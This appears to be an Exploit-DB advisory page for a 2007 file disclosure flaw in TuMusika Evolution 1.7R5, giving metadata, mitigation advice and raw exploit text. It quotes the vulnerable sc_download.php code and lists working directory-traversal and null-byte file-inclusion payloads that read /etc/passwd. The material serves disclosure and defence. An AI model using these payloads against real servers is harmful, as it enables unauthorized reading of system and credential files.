TuMusika Evolution 1.7R5 Remote File Disclosure Vulnerability

vendor:

TuMusika Evolution

by:

Unknown

7.5

CVSS

HIGH

Remote File Disclosure

CWE

Product Name: TuMusika Evolution

Affected Version From: 1.7R5

Affected Version To: 1.7R5

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

TuMusika Evolution 1.7R5 Remote File Disclosure Vulnerability

The vulnerability allows an attacker to disclose files on the server by exploiting a flaw in the TuMusika Evolution 1.7R5 script. By manipulating the 'uri' parameter in the sc_download.php script, an attacker can traverse the file system and access sensitive files. The exploit example provided demonstrates accessing the /etc/passwd file.

Mitigation:

The vendor should release a patch to fix the vulnerability. In the meantime, users are advised to restrict access to the sc_download.php script and sanitize user input to prevent directory traversal attacks.

Source

Exploit-DB raw data:

TuMusika Evolution 1.7R5 Remote File Disclosure Vulnerability
Script : http://sourceforge.net/project/platformdownload.php?group_id=186000
#################/frames/nogui/sc_download.php#################
<?
$file = $_GET['uri'] ;<---[xxx]
$title = $_GET['title'] ;
header('HTTP/1.1 200 OK');
header("content-type:audio/mp3");
header('Content-Disposition: attachment; filename="'.$title.'.mp3"' );  
readfile($file);<---[xxx]
?>
###############################################################
Exploit:
/Evolution1.7/frames/nogui/sc_download.php?uri=../../../../../../etc/passwd
###############################################################
TuMusika Evolution 1.7R5 Local File Inclusion Vulnerabiliies
POC:
/Evolution1.7/inc/languages_n.php?language=../../../../../../etc/passwd%00
/Evolution1.7/inc/languages_f.php?language=../../../../../../etc/passwd%00
/Evolution1.7/inc/languages.php?language=../../../../../../etc/passwd%00

# milw0rm.com [2007-11-28]